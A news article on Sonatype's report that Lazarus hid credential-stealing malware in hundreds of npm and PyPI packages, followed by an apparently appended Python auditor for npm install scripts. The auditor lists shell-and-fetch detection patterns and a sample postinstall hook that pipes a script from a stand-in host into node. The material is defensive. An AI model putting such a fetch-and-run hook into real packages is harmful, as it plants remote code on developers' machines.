UPDATED 06:00 EDT / JULY 30 2025


Lazarus turns open source into a weapon in its latest global espionage push

A new report out today from software supply chain security firm Sonatype Inc. details how the infamous North Korea-backed hacking group Lazarus has intensified its cyber espionage operations by embedding sophisticated malware into open-source packages.

The report details that Sonatype detected and blocked 234 unique malicious packages tied to Lazarus between January and July this year, with more than 36,000 potential developer victims globally.

Lazarus needs little introduction to those who follow cybersecurity, since it has been active for many years. Some of the group’s best-known attacks include the 2014 Sony breach and the 2017 WannaCry ransomware campaign.

Like many similar groups, Lazarus has shifted tactics over the years. Today, instead of simply attacking financial institutions directly, the group has become stealthier by targeting developers and deployment environments. It plants malware in widely used open-source repositories such as npm and PyPI. The malicious packages from Lazarus are designed to mimic trusted libraries, often through typosquatting or combo-squatting, to trick developers into unknowingly installing backdoors into their systems.

In one example, Lazarus published a malicious npm package, vite-postcss-helper, that uses a multi-stage attack chain: a dropper contacts a command-and-control server to fetch an obfuscated loader, and the loader then deploys multiple stealthy payloads, including a clipboard stealer, a credential harvester dubbed “BeaverTail,” a broad file exfiltrator and a Windows-specific keylogger and screenshot tool. More than 90 of the packages were designed specifically for secrets exfiltration, indicating that the intent of the campaign is espionage and long-term infiltration rather than making money.

The Lazarus campaign exploits the trust developers place in the open-source packages used in modern development pipelines. Since package installations are often automated and poorly scrutinized, attackers can reach massive scale with minimal visibility, often remaining under the radar.

Because of the methodology — sneaking the malicious code into the open-source codebase — the malicious components can persist undetected for months inside build systems and developer machines, harvesting credentials, application programming interface tokens and source code access.

Sonatype warns that the trend reflects a broader evolution in cyberthreats: Nation-state actors are now embedding themselves directly into the software development lifecycle, rather than simply attacking potential targets directly.

The report makes a number of recommendations that SecOps and DevSecOps teams can implement to mitigate risks. They include adopting a layered defense strategy to secure the software supply chain and deploying a repository firewall to block suspicious or malicious packages before they reach build systems. Sonatype also urges security teams to monitor for unusual post-installation behavior, such as shell execution or remote script retrieval.
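One way a defender can act on the last of those recommendations, checking install-time behavior before a package ever runs, is to audit the lifecycle scripts npm executes automatically. The example below is added here and is not code from the report or from Sonatype; the package names and manifests in it are constructed, and the regular expressions are an assumed set of heuristics for shell execution and remote script retrieval, not a list of Lazarus indicators.

```python
import json
import re
from pathlib import Path

# Install-time lifecycle hooks that npm runs automatically; a malicious
# package typically launches its dropper from one of these.
LIFECYCLE_HOOKS = ("preinstall", "install", "postinstall", "prepare")

# Heuristics (an assumption, not a Lazarus indicator list) for the two
# behaviours named in the report: shell execution and remote script retrieval.
SUSPICIOUS = (
    (re.compile(r"\b(curl|wget)\b"), "remote fetch via curl/wget"),
    (re.compile(r"https?://"), "URL in install script"),
    (re.compile(r"\bnode\s+-e\b"), "inline node eval"),
    (re.compile(r"\b(sh|bash|powershell|cmd(?:\.exe)?)\b"), "shell invocation"),
    (re.compile(r"\|\s*(sh|bash|node)\b"), "output piped into an interpreter"),
    (re.compile(r"\b(eval|base64|atob)\b"), "decode/eval of embedded data"),
)

def audit_manifest(manifest: dict) -> list:
    """Return (hook, reason, command) triples for suspicious lifecycle scripts."""
    findings = []
    for hook in LIFECYCLE_HOOKS:
        cmd = (manifest.get("scripts") or {}).get(hook, "")
        for pattern, reason in SUSPICIOUS:
            if pattern.search(cmd):
                findings.append((hook, reason, cmd))
    return findings

def audit_node_modules(root: str) -> dict:
    """Audit every package.json under root/node_modules, nested deps included."""
    report = {}
    for path in Path(root, "node_modules").glob("**/package.json"):
        try:
            manifest = json.loads(path.read_text(encoding="utf-8"))
        except (OSError, ValueError):
            continue  # unreadable or malformed manifest: skip it, do not abort the audit
        if findings := audit_manifest(manifest):
            report[manifest.get("name", str(path))] = findings
    return report

# Constructed sample manifests with hypothetical package names (not real packages).
SAMPLE_MANIFESTS = {
    "benign-helper": {"scripts": {"test": "jest", "build": "tsc"}},
    "postcss-helper-lookalike": {"scripts": {"postinstall": "curl -s https://example.invalid/loader.js | node"}},
}

def audit_samples() -> dict:
    # Only packages with at least one finding are returned.
    return {n: f for n, m in SAMPLE_MANIFESTS.items() if (f := audit_manifest(m))}
```

Run `audit_node_modules(".")` in a project directory to check real installed dependencies; a hit is a reason to inspect the package, not proof of compromise, since some legitimate packages also download native binaries at install time.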
